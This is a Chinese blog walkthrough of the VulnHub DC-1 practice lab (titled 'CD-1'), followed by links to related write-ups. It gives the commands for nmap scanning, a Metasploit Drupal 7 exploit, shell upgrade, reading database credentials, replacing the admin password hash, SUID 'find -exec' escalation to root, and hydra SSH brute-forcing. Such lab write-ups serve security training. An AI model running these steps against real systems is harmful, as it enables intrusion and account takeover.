CD-1靶场通关详细步骤

最新推荐文章于 2024-10-08 20:02:35 发布
最新推荐文章于 2024-10-08 20:02:35 发布
阅读量872 收藏 10
点赞数 21
文章标签: 数据库 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_79931281/article/details/142406946
版权
  • 搭建环境
  1. 描述靶场

CD-1是一个专门建造的易受攻击的实验室,在获得渗透测试领域的经验。它被设计成对初学者的一个挑战,但是它有多简单取决于你的技能和知识,以及你的学习能力。要成功完成这个挑战,你需要Linux技能、熟悉Linux命令行和基本渗透测试工具的经验,比如可以在Kali Linux或Parrot Security OS上找到的工具。有多种获得根的方法,但是我已经包括了一些标志,其中包含初学者的线索。总共有五个标志,最终目标是找到并读取root用户主目录中的标志。也可以不成为root用户就可以做到这一点,但需要root权限。初学者可能会遇到他们以前从未遇到的挑战,但是Google搜索应该是完成这个挑战所需要的全部信息。总之是一共有五个flag,最终目标是找到root用户主目录中的flag。

        2.下载地址

https://www.vulnhub.com/entry/dc-1,292/

        3.已知我们的目标是找到root用户主目录中的flag。然后把我们所需的应用程序打开,要注意的是网络设置,要与攻击机kali在同一网段,要么就是都用NAT模式。

  • 渗透靶场
  1. 进入kali后,输入sudo su进入root权限

        2.信息收集寻找靶机真实IP //nmap -sP192.168.35.1/24

扫描网段中有哪些主机在线,使用-sP参数,不扫描端口,只扫描存活主机。本质上是Ping扫描,能Ping通有回包,就判定主机在线。

        3.信息收集探测端口和服务//nmap -A -p- -v 192.168.35.129

发现开放了22端口,开放ssh服务,OpenSSH 6.0p1

发现开放了80端口,存在web服务,Apache httpd 2.2.22,Drupal 7

发现开放了111端口,开放rpcdind服务

        4.访问web站点192.168.35.129

发现是一个电信的drupal服务,根据nmap结果可知当前运行的是Drupal 7的CMS

        ·利用MSF渗透

典型的drupal,启动Metersploit  MSF存在drupal模块,尝试使用msf渗透

  1. MSF简单命令介绍

msfconsole            进入MSF控制台

search                   搜索相应模块

use                对应模块

show options       查看信息

set RHOST           远程主机ip

run                攻击

        2.搜索Drupal 7的漏洞

搜索发现可利用的漏洞很多// searchsploit drupal 7

        3.利用msf渗透先进入MSF控制台//msfconsole

        4.搜索drupal模块//search drupal

        5.选择模块进行测试,设置靶机IP运行MSF run攻击

        6.先进入shell再执行whoami

        7.发现是www-data权限

进入home目录,发现flag4.txt文件,提示需要提升权限

        8.使用python反弹一个交互式shell  //python -c "import pty;pty.spawn('/bin/bash')"

        9.查看www目录下文件,发现flag1.txt文件,打开发现提示信息,内容提示寻找站点的配置文件 //cd /var/www

        10、查看文件内容

cat /var/www/sites/default/settings.php

    发现了flag2和数据库的账号密码

flag2提示,提升权限为root来查看敏感文件,或者直接爆破

       先进入数据库查看

        mysql -u dbuser -p

查看数据库,切换到drupldb数据库

show databases;/use drupaldb

        11.查看查找默认的Drupal user 表//select * from users;

发现admin信息

12、置换drupal密码

进入WWW目录//quit;

站点路径下执行//php scripts/password-hash.sh 新密码111

然后在进入数据库中把密码字段进行替换
进入mysql,输入密码,切换到drupaldb数据库

mysql -u dbuser -p

R0ck3t

use drupaldb

将pass字段进行替换

update users set pass="$S$DW/j0Hhhx6pIBV4ZkoBp3mv/5l8reTwEBdpgzB/x8awTYUfFkd2k" where name="admin";

        13.登录站点

访问站点192.168.35.129

进行登录,密码是之前我们自己替换的111,账号是admin

成功登录

        14.发现flag3

登陆战点之后,翻一番,发现flag3

点击flag3进入,发现提示信息

Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.//使用命令查看suid权限的可执行二进制程序

find / -perm -4000 2>/dev/null

        15.使用命令测试,发现为root权限

        touch 123

        ls

        find / -name 123 -exec "whoami" \;

      

        16.发现最后的flag文件

我们切换语句进入shell,执行whoami查看当前权限,执行ls查看当前目录下文件,切换到root目录,查看文件,发现cat thefinalflag.txt文件。

find /var/www/misc -exec "/bin/sh" \;

whoami

ls

cd /root

ls

查看cat thefinalflag.txt文件

翻译大致就是说已经通关了

        17、发现flag4

我们查看 /etc/passwd 文件,发现存在 flag4 用户,我们也可以使用 hydra 进行爆破

cat /etc/passwd

       先Ctrl+z退出

进入john目录cd /usr/share/john

hydra -l flag4 -P password.lst ssh://192.168.35.129

完成啦!

果冻女孩.
关注
【xss-labs靶场实战通关教程】
AuroraMiraitowa的博客
03-09 1147
好吧,原来还有其他隐藏的传参方法,学到了,下次就一个个测,这里是get传参t_sort,并过滤掉了<>号,不能闭合插入标签,但是我们还能用onfocus事件,因为这里输入框被隐藏了,需要添加type=“text”,构造payload。不难发现,这里面进行了小写转化,将检测出来的on,script,href给删掉了,但是没有关系,我们可以利用双拼写来绕过,这里可以看到,Get传参的值,只插入了h2标签里头,额那下面的input标签啥东西,还隐藏掉了。
DC-3靶场通关详细步骤
2301_79931281的博客
10-06 1033
DC-3是另一个专门建立的易受攻击的实验室,旨在获得渗透测试领域的经验。与之前的DC版本一样,这个版本是为初学者设计的,尽管这一次只有一个标志,一个入口点,根本没有线索。必须具备Linux技能并熟悉Linux命令行,还必须具有使用基本渗透测试工具的经验。对于初学者来说,谷歌可以提供很大的帮助,但你可以随时在@DCAu7上推我让你重新开始。
DC-2靶场通关详细步骤
2301_79931281的博客
09-26 800
DC-2是另一个专门建造的易受攻击的实验室,目的是在渗透测试领域获得经验。 与最初的DC-1一样,它的设计考虑到了初学者。Linux 技能和对Linux 命令行的熟悉是必须的,对基本渗透测试工具的一些经验也是必须的。和DC-1一样,有五个flag最终目标是找到root用户主目录中的flag
DC-1渗透靶场实战速通版
saber的博客
12-01 992
开启 Kali 和 DC靶机,确保二者互相可以ping通,Kali地址根据命令可以查找到,但是DC靶机我们是没有画面的,只是开启了一个环境,我们可以在虚拟机的设置里面找到。得出新的admin的密码后,又开始重复步骤,登录数据库,使用数据库语句修改指定表指定字段中的值,修改密码为我们123456加密后的值。回到终端,退出数据库,使用命令查看提示文件。
DC-6靶场实战
qq_42754807的博客
03-26 1096
DC-6靶场实战
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-5 通关详解 (附靶机搭建教程)
qq_51577576的博客
04-12 1929
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-5 通关详解 (附靶机搭建教程) 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
Vulnstack-内网靶场1-通关解析
小小小屿屿屿的博客
04-12 416
上传木马文件到目标主机,然后kali使用multi/handler模块进行监听,然后在蚁剑运行上传的木马文件,即可获取权限,这一次直接提权即可。结合之前端口扫描,我们使用exploit/windows/smb/psexec模块,然后进行横向渗透。结果:全部C段网站都存活 ===> 挂代理用kali扫不动,于是便换成CS进行C段扫描。CS生成木马文件,将木马文件上传到目标服务器,运行,然后直接进行提权。网上搜索phpmyadmin历史漏洞。首先ipconfig看一下IP地址。====> 并发现有域的存在。
DC-2通关基本步骤
最新发布
2401_84645748的博客
10-08 523
与DC-1非常相似,DC-2是另一个专门建立的易受攻击的实验室,目的是获得渗透测试领域的经验。就像DC-1一样,有五面旗帜,包括最后一面旗帜。我没有探索实现root的所有方法,因为我放弃了我一直在研究的上一个版本,并从基本操作系统安装中完全重新开始,和DC-1一样,有五个flag。很高兴看到你走了这么远,但你还没回家,您仍然需要获得最后的标志(唯一真正重要的标志,这里没有暗示,你现在只能靠自己了,继续,猜想需要提权才能获取到最终的flag,并且flag4 提示我们可以使用git,我们可以通过git来提权。
DC-2详细通关实验报告
2301_78713407的博客
09-27 1248
DC-2和DC-1非常相似,DC-2是另一个专门建立的易受攻击的实验室,目的是要获得渗透测试领域的经验。点击去之后,我们可以看到flag2的提示信息,简单来说就是如果wordpress不可以的话就需要其他方法,我们之前发现有ssh,我们可以看看ssh.发现访问不了,而且发现我们输入的IP地址自动转化为了域名,dc-2这个域名解析失败了,我们需要更改hosts文件,添加一个IP的域名指向。cewl http://dc-2/ -w dict.txt 或者 cewl http://dc -2/ > 1.txt。
docker搭建vulhub靶场
weixin_55554070的博客
08-27 1092
近期自己想本地搭建一个靶场去多多练习漏洞理解漏洞原理,就在找资料docker搭建vulhub靶场。前面走过很多弯路,想在kali上搭建,但一直都搭建不起,就放弃了。kali出现的问题是公钥连接不上服务器(也有可能是自己kali版本的问题2019年的,太懒就没有重新安装),看了很多文章也没解决,就换成了centos7了,参考文章按照步骤来安装成功。 参考链接:https://www.jianshu.com/p/8264936cac30 步骤一:确定centos7能上网 步骤二:安装docker需要先
VulnHub-DC-1靶机渗透测试和相应的知识点总结
qq_45584159的博客
12-15 1432
文章目录前言一、探测目标主机的ip1.使用arp-scan -l 命令,来探测同一局域网内的存活主机。2.使用netdiscover -i eth0二、使用namp扫描目标主机的开放端口,并通过开放端口得到更多的信息三. .Metasploit漏洞利用msf的简单使用:术语:模块:基础指令:模块使用规则:msf中大多数命令:第一步.启动msf:第二步.搜索drupal可利用的漏洞第三步,采用最新的2018漏洞尝试攻击,配置参数第四步,反弹shell四. 进入数据库第一步.进入数据库 前言 这是我第一次使用
ATT&CK红队评估(红日靶场四)
weixin_45682839的博客
04-28 5603
ATT&CK红队评估(红日靶场四)通关攻略,涉及知识包括: Struts2漏洞利用、phpmyadmin getshell、tomcat 漏洞利用、ms17_010、docker逃逸、ms14_068、ssh密钥利用、流量转发、横向移动、内网渗透等。
【WEB安全】PHP靶场实战分析——DVWA
真哥的博客
12-20 4921
文章目录前言一、实战前的准备:1.dvwa靶场安装2.代码审计工具介绍2.1.seay代码审计工具的介绍2.2.rips 审计工具介绍二、DVWA通关讲解1. brute force 暴力破解low:Medium:High:impossible:2. Command Injection(命令行注入)low:Medium:High:3. CSRF(跨站请求伪造)low:Medium:High:4. File Inclusion(文件包含)low:Medium:High:impossible:5. File U
鲁班到家上门安装维修系统源码开发之结构功能解析
weixin_43744973的博客
10-08 912
鲁班到家上门安装维修系统的源码开发是一个复杂但富有成效的过程。通过详细的需求分析、技术选型、功能模块设计以及前后端分离开发,该系统不仅提升了服务效率,还通过数字化管理优化了用户体验。未来,该系统有望在智能家居售后服务领域发挥更加重要的作用,引领行业向更加高效、专业、透明的方向发展。
ATAM需求说明-系统架构师(七十六)
ke1ying的博客
10-08 793
1体系结构权衡分析法ATAM(Architecture Trade Off Analyzer Method)是一种常见的结构权衡分析法,该框架主要关注系统的(),针对性能、安全性、可用性和可修改性,在系统开发前进行分析、评价和这种。A共享数据库的集成方式通常将应用程序的数据存储在一个共享数据库中,通过制定统一的数据库模式来处理不同应用集成需求。场景和需求的收集,架构视图和场景的实现,属性模型的构造和分析,架构评价和折中。7企业信息资源集成管理的前提是对企业()的集成,其核心是对企业()的集成。
World of Warcraft [CLASSIC][80][Grandel] Call to Arms: Victory in Wintergrasp
qq 117791303
10-02 350
Wintergrasp 冬拥湖 120 VS 120
同城O2O系统源码与跑腿配送平台的架构设计与开发方案详解
meihusdk的博客
10-08 407
同城O2O系统与跑腿配送平台的开发,既是技术的挑战,也是商业机会的探索。通过合理的架构设计与清晰的开发方案,开发者可以构建出高效、稳定且易于扩展的平台,为用户提供更为便捷的服务。
思迅商云开启货号修改语句
xushugang007的博客
10-03 240
insert into t_sys_system (sys_var_id,sys_var_name,sys_var_value,is_changed,sys_ver_flag) values('itemnoisedit','货号、供应商、客户编码修改','1','否','1')use hbposv10 --分店数据库名改成: hbposv10_branch。--开启 货号、供应商、客户编码修改。
upload-labs靶场通关
09-14
要通过upload-labs靶场,你需要完成以下几个步骤: 1. 首先,你需要上传一个文件到服务器。通过使用move_uploaded_file函数,将临时存储路径的文件移动到指定的上传目录。具体代码可以参考引用中的示例。 2. 上传...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值